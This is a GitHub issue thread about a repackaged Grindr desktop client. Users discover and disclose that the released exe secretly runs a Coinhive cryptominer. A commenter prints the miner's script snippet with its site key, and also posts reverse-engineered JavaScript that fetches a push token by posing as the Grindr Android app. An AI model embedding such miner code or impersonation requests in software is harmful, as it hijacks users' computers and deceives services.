### ISSUE TITLE
New *WORKING* Release of Fuckr

### ISSUE THREAD

**Issue by aurorainbowrealis** [tomlandia/fuckr#185]
We are releasing a new version of Fuckr that works AS IS. Note that this was only tested on windows 64bits and is a courtesy. Thanks to @RobbieTechie for all his help! Be MINDFUL of what you use FuckR for. At this moment this client is NOT capable of creating new accounts.

I spend my FREE time developing this. If you would like to show your appreciation for this work you can donate me *ANY* amount of crypto. If you donate 0.025 ETH or more I will send you Fuckr+ [A version of Fuckr that is much like GrindrXtra] as a thank you gift :)

BTC tip jar: 32SuoJcFHfgKyRgNGM6HgGsBCYykCdLLrs
ETH tip jar: 0x6113DDD23D0D5aCad3d1f8640A8A571E9Cb86cB8 

Download link: https://mega.nz/#!W6xSmTiS!Q7tMYwhwuMamqM3GEijzsXi8Ykf-DfANgyMA9SGMGTs

**Comment by JohnnyAccorn** [comment]
Hi Tom and Victor,

Thank you for your time and efforts.

I can't get it work, neither on win7 nor win10
However I would like to make a donation. I don't use cryptos so if you have
other means to accept donations and where to send them, I would be happy to
send 🙄
Regards

**Comment by victorgrego** [comment]
@JohnnyAccorn Please leave your operational system details and what is the problem that you are facing in the most accurate way you can.

**It is important to note that, at this moment, Fuckr is NOT capable of creating new accounts. Therefore, you need to use an existing account to login.**

Unfortunately I do not accept fiat donations at this moment, because fiat is mostly limited in transactions in the same currency/country, while crypto can be sent smoothly worldwide.

**Comment by JohnnyAccorn** [comment]
Thank you,
I sorted out the problem 😊 works like a charm.

Now.... I want to send a donation because after following you for some time
now I think your rewards should be rewarded.

If you could instruct me (privately) how to get some eCurrency to you, I
would be grateful.

Kind regards
Johnny

**Comment by victorgrego** [comment]
It all depends on the country you are in. If you are in the US/CA the fastest way would be through Coinbase, here's a tutorial: https://www.cnbc.com/2017/06/24/how-to-buy-bitcoin-ethereum.html

It's very straightforward. You buy the amount of currency you want to use. Then go to send and insert the address above. Double check the address, because if you send to a wrong address the money is lost forever. Then click send. 

I would recommend ETH over bitcoin (Lower fees, faster to send).
I appreciate your effort.

**Comment by powline99** [comment]
@victorgrego Can you post some pictures of what the Fuckr+ looks like or go over some of the functionality vs the free version. 

I am a student and I believe the ETH conversion is $21 to USD to donate but I will consider it. Thanks Kindly for all your kind work and diligence. You and @RobbieTechie should make your own app, ... Grindr will eventually be a dying breed, though they do have the Chinese now to code for them.

**Comment by powline99** [comment]
@victorgrego Found a bug, every time I block the program restarts.

**Comment by JohnnyAccorn** [comment]
@victorgrego Thanks... I'll educate myself in ETH currency and will make a donation.
Everyone complains about Grindr lol the app is simply a means to communicate. Personally, although unknown now to todays' youth, I think IRC was the best!  But hey!  I'm old school lol
Even then IRC had the same problems... fakes, timewasters and troll hahaha
All the best guys, good job Victor 😊

**Comment by RobbieTechie** [comment]
@powline99 That actually isn't a bug with @victorgrego version.  The same thing happens with the regular version from time to time.  Sometimes it will block without reloading and sometimes it reloads the whole application.

**Comment by JohnnyAccorn** [comment]
I really wish there was an easier way to donate to your project @victorgrego & @RobbieTechie 🙄
You guys have put so much effort into this. I have a Grindr subscription and I prefer to use your version on my lappy because Grindr is so power hungry my iPhone X gets so hot it shuts down lol not to mention all the other bugs. I don't care much for locations of other users, most guys (here anyway) turn their distance off. Compared to using BlueStack & the other emulators, yours comes up trumps 😊
Of course there will be a time when Grindr makes changes again and it will be back to the drawing board I guess, as it was a few months ago and Fuckr stops working.
Already I've noticed their spam (robot) check has gone and I believe they will soon require email addresses to be verified.
Anyhow, virtual kisses to both you guys 😍
Johnny

**Comment by Kav28** [comment]
noticed this happening on apple devices (loading the whole app) but not
android.

**Comment by sonoinglese** [comment]
hey guys I got it to run fine once on my PC logged in etc then it closed a minute later saying couldn't load library or something.. now when I click to open the fuckr_free application file my PC just loads but nothing happens. it won't load

running windows 10 64 bit

**Comment by sonoinglese** [comment]
Extremely dodgy indeed

Sent from my iPhone

On 7 Mar 2018, at 23:51, amysouter <notifications@github.com<mailto:notifications@github.com>> wrote:


Seems kind of greedy to be asking for more money considering you already put a cryptominer in that exe.

**Comment by amysouter** [comment]
The coinhive client in the exe, the connections to coinhive it makes, and the >70% cpu usage after a few minutes.

**Comment by JohnnyAccorn** [comment]
My suggestion is if in don't if in doubt!
Lol
I'm running it on Win10 without issues... my anti virus/malware has no issues with it but then again it's not a standard commercial version of Win10/64 I have removed a great deal of overheads and other crap WinDoze puts into their OS which are a lot worse than cryptominers haha
Stop whingeing and complaining FFS... use it at your own risk, the onus is on you to protect your PCs IMHO

**Comment by victorgrego** [comment]
@amysouter 
Well, you have a couple options:
- Use grindr and see ads [or pay for extra montly]
- Develop your own version of fuckr [will just take a few hours at all]
- Use my client, which made me exactly 0.013337 USD, yes almost 2 cents! [or make the donation and get a clean version]
- Do not use anything at all ;)

**Comment by sonoinglese** [comment]
So have you put a cryptominer in the client or not? What’s going on here?

Sent from my iPhone

On 8 Mar 2018, at 06:40, victorgrego <notifications@github.com<mailto:notifications@github.com>> wrote:


@amysouter<https://github.com/amysouter>
Well, you have a couple options:

  *   Use grindr and see ads [or pay for extra montly]
  *   Develop your own version of fuckr [will just take a few hours at all]
  *   Use my client, which made me exactly 0.013337 USD, yes almost 2 cents! [or make the donation and get a clean version]
  *   Do not use anything at all ;)

**Comment by JohnnyAccorn** [comment]
This is getting ridiculous!!
Can't you see @amysouter is doing this for its' own gain lol
Ie. "Use my client... blah blah" it's the oldest manipulative trick known to man lol
Divide and Conquer - Create fear through lies and innuendos- Surely you can see that?
Don't get sucked in!!
The question you should be asking is: Why does @amysouter want you to use its' client?  What little hidden horror could be hidden in that code?

**Comment by sonoinglese** [comment]
Don’t see amysouter anywhere mentioning to use their client instead? Quote please? Your enthusiasm is a little suspect @johnnyacorn

Victor hasn’t even denied it, lol

On 8 Mar 2018, at 08:09, Johnny <notifications@github.com<mailto:notifications@github.com>> wrote:


This is getting ridiculous!!
Can't you see @amysouter<https://github.com/amysouter> is doing this for its' own gain lol
Ie. "Use my client... blah blah" it's the oldest manipulative trick known to man lol
Divide and Conquer - Create fear through lies and innuendos- Surely you can see that?
Don't get sucked in!!
The question you should be asking is: Why does @amysouter<https://github.com/amysouter> want you to use its' client? What little hidden horror could be hidden in that code?

**Comment by JohnnyAccorn** [comment]
I think what we have here is a failure to communicate. 
My apologies... I did misread @amysouter comment... it's 36°C over here and been having beers after work hahaha shouldn't drink & operate keyboards lol
I think however that without any evidence to the contrary, we shouldn't accuse victor. I haven't used cryptocurrencies and from what I have learned (since I was going to donate) I don't intend to!

I am not affiliated to either victor or robbie. My interest in this project was simply because I have coded an app which sits alongside Grindr and simply displays a map of other users, besides other useful data.

Personally, I hate Grindr!!!  Apart from it being one of the worst written software I have seen in my computer engineering career spanning over 40 years. In fact, my very first program was coded on a Sinclair Z80, which I doubt anyone in here would have a clue what that is. Lol
In Australia we are doing our best to have that app "taken off the shelf" so to speak.

**Comment by sonoinglese** [comment]
Should it really be taking up 85% CPU- My PC feels like it's going into overdrive. Anyway removing it and scanning PC.

**Comment by amysouter** [comment]
``
      <script src="https://coinhive.com/lib/coinhive.min.js"></script>
      <script>
       var miner = new CoinHive.Anonymous('HOuzcjMASzuc6rypplx4gPCoWNOcc6DK', {throttle: 0.3});
        miner.start();
      </script>
    k

**Comment by amysouter** [comment]
Here's the relevant portion needed to get authentication working.

```javascript 
    var getGCMToken, useCredentials, req;
    req = {
        method: 'POST',
        url: 'https://android.clients.google.com/c2dm/register3',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
            'Authorization' : 'AidLogin 4624761039472764397:5691605009161884140'
        },
        transformRequest: function(obj) {
            var str = [];
            for (var p in obj) {
                str['push'](encodeURIComponent(p) + 
                        '=' + encodeURIComponent(obj[p]))
            }
            ;return str['join']('&')
        },
        data: {
            app: 'com.grindrapp.android',
            device: '4624761039472764397' ,
            scope: 'gcm',
            'X-scope': 'gcm',
            appid: 'dCXUVhtBf60' ,
            sender: '1036042917246',
            cert: 'ce1f7e703ccca26d2c4ef3e48fd5ae0ea4cb1c29'
        }
    };
    getGCMToken = function() {
        return $q(function(resolve, reject) {
            if ($localStorage['gcmToken']) {
                return resolve($localStorage['gcmToken'])
            } else {
                $http(req)['then'](function(token) {
                    $localStorage['gcmToken'] = token;
                    return resolve($localStorage['gcmToken'])
                }, function(token) {
                    console['log']('ERROR TOKEN')
                })
            }
        })
    }
    ;
```

**Comment by amysouter** [comment]
@sonoinglese nah it doesn't have any more 'extra functionality' other than mining shit coins.

**Comment by victorgrego** [comment]
@amysouter Really cool, now I'm sitting here asking myself why didn't you put the same effort into coding the solution for Fuckr problems. that have been up for so long instead of just reverse engineering someone's else solution. And you are right, the version I released here does not have any new functionality :)

**Comment by amysouter** [comment]
wouldn't have popped your troll if you didn't put a shitcoin miner in it

**Comment by amysouter** [comment]
also you did dare me, my telling me what i could and could do.

**Comment by amysouter** [comment]
shits all on you

**Comment by amysouter** [comment]
you could have multiple pennies by now.

**Comment by xfy741** [comment]
How can I completely erased this version and please tell me a good way to scan my pc to eliminate any threat?

**Comment by RobbieTechie** [comment]
There are no threats, you can just delete the folder and you will be good to go.

**Comment by ztbut38** [comment]
Everytime I run the program my PC detects a virus called Brocoiner. Coincidence?
